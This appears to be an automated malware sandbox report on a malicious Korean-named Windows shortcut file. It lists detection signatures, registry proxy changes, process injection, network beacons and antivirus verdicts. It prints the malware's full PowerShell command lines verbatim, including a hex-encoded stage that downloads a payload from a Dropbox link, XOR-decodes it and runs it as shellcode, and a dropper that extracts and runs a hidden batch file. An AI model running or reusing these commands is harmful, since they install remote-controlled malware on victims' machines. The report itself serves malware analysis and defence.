Data sent	\|xe?mÝ: idT<+DlÇ*hÑa[Î:Y/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m¸"c¢·!!ÑØÞö<Ö9,DUåÔ¡IÁ:/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m&;³^uInPxB/yÅO+Û¶ÈºÉ`~?,/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mú6~móÈpÜ oþ=I± wø©2(©Â"{§/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m%J!Q²¶í©iT´%?TL]·ÂÚSenY/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m)Måz7®IU:£tà`6x.cæ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m¦óÆ,ýËü\|E`Û¼ñØq´?ºkÒ ßlSØ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m¦®¨ +n#ÛÓ9u¿b·lraê&ÙÄ½/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m±¸Ê¬m¢¾3y-Ý^ã©t+ÁÊPwFîM6/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m±òLQèý{&½Ö6=NºÛÐ;ª'/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m¼#¼æ /Ð´d,JU£8Ó¬ÎSLÊÃ?x&/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?m¼ç¤µ+¾ò«Éjõ^ßÃ¹ë²´û·/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mÇ¶% À# {/~0!¦gdïü5raIó/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mÇcë¢eØÆã×²ÃÙhU¬(çc¶«u~S/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 30, 2023, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 30, 2023, 5:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 71 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qceyv3jp.cmdline"
cmdline	"C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\282310.bat&&echo SET b=shell.exe>>C:\Users\Public\282310.bat&&echo SET M=%a%%b%>>C:\Users\Public\282310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\282310.bat&& start /min C:\Users\Public\282310.bat&&exit
cmdline	C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\sbjraxxu.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\xj4njtpx.cmdline"
cmdline	c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
cmdline	powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qwrnexiw.cmdline"

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 30, 2023, 5:46 p.m.	key_handle: 0x0000064c regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 30, 2023, 5:46 p.m.	key_handle: 0x0000064c regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the processes excel.exe, powershell.exe (25 events)

Time & API	Arguments	Status	Return
HttpOpenRequestW Oct. 30, 2023, 5:46 p.m.	connect_handle: 0x00cc0008 http_version: flags: 4195328 http_method: GET referer: path: /salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE	1	13369356
send Oct. 30, 2023, 5:46 p.m.	buffer: ! socket: 1632 sent: 1	1	1
send Oct. 30, 2023, 5:46 p.m.	buffer: GET /salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE HTTP/1.1 Accept: / Accept-Language: ko-KR Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: app.documentoffice.club Connection: Keep-Alive socket: 352 sent: 392	1	392
send Oct. 30, 2023, 5:46 p.m.	buffer: ! socket: 1632 sent: 1	1	1
InternetCrackUrlA Oct. 30, 2023, 5:46 p.m.	url: http://app.documentoffice.club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE flags: 0	1	1
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mc?DêÒ1º&XFgè(hÁqgÅB+m¿õ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mc 81]¿W°¦nA³'§çÈx]®®F*·Ä÷/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mn£Úÿ×Ëõ½¸ÀPnn~\4w¶2£%~/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mnQ5Á~DÃ ù#Y;.à`Ü^óÀö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?myðÛe1)ÆhØy9m©bOôï½&8/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?myßÂ5R©JtÄ2ÌàÅò7E"2DhÖz/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mÝ: idT<+DlÇ*hÑa[Î:Y/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?m¸"c¢·!!ÑØÞö<Ö9,DUåÔ¡IÁ:/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?m&;³^uInPxB/yÅO+Û¶ÈºÉ`~?,/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:46 p.m.	buffer: \|xe?mú6~móÈpÜ oþ=I± wø©2(©Â"{§/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m%J!Q²¶í©iT´%?TL]·ÂÚSenY/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m)Måz7®IU:£tà`6x.cæ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m¦óÆ,ýËü\|E`Û¼ñØq´?ºkÒ ßlSØ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m¦®¨ +n#ÛÓ9u¿b·lraê&ÙÄ½/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m±¸Ê¬m¢¾3y-Ý^ã©t+ÁÊPwFîM6/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m±òLQèý{&½Ö6=NºÛÐ;ª'/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m¼#¼æ /Ð´d,JU£8Ó¬ÎSLÊÃ?x&/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?m¼ç¤µ+¾ò«Éjõ^ßÃ¹ë²´û·/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?mÇ¶% À# {/~0!¦gdïü5raIó/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129
send Oct. 30, 2023, 5:47 p.m.	buffer: \|xe?mÇcë¢eØÆã×²ÃÙhU¬(çc¶«u~S/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1304 sent: 129	1	129

One or more non-whitelisted processes were created (7 events)

parent_process	powershell.exe	martian_process	"C:\Users\Public\281023.bat"
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조사2023.xlsx
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\sbjraxxu.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\xj4njtpx.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qwrnexiw.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qceyv3jp.cmdline"

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3000 resumed a thread in remote process 932
Process injection	Process 932 resumed a thread in remote process 2272
Process injection	Process 1728 resumed a thread in remote process 1472
NtResumeThread Oct. 30, 2023, 5:45 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 932	1	0	0
NtResumeThread Oct. 30, 2023, 5:45 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2272	1	0	0
NtResumeThread Oct. 30, 2023, 5:46 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1472	1	0	0

Creates a suspicious Powershell process (3 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Lionic	Trojan.WinLNK.Agent.4!c
Skyhigh	BehavesLike.Trojan.vx
VIPRE	Heur.BZC.YAX.Pantera.117.8C5C9C7D
Symantec	CL.Downloader!gen119
ESET-NOD32	a variant of Generik.FMGYVKU
Avast	LNK:Agent-HS [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Pantera.117.8C5C9C7D
Sophos	Troj/LnkDrop-M
FireEye	Heur.BZC.YAX.Pantera.117.8C5C9C7D
Emsisoft	Heur.BZC.YAX.Pantera.117.8C5C9C7D (B)
SentinelOne	Static AI - Suspicious LNK
MAX	malware (ai score=88)
Microsoft	TrojanDownloader:PowerShell/MoniSaint.C!dha
Arcabit	Heur.BZC.YAX.Pantera.117.8C5C9C7D
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Heur.BZC.YAX.Pantera.117.8C5C9C7D
Google	Detected
AhnLab-V3	Dropper/LNK.Generic.S2373
VBA32	Trojan.Link.Crafted
ALYac	Trojan.Agent.LNK.Gen
AVG	LNK:Agent-HS [Trj]
Panda	JS/BondatN.gen

주요도시 시장가격 조사2023.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All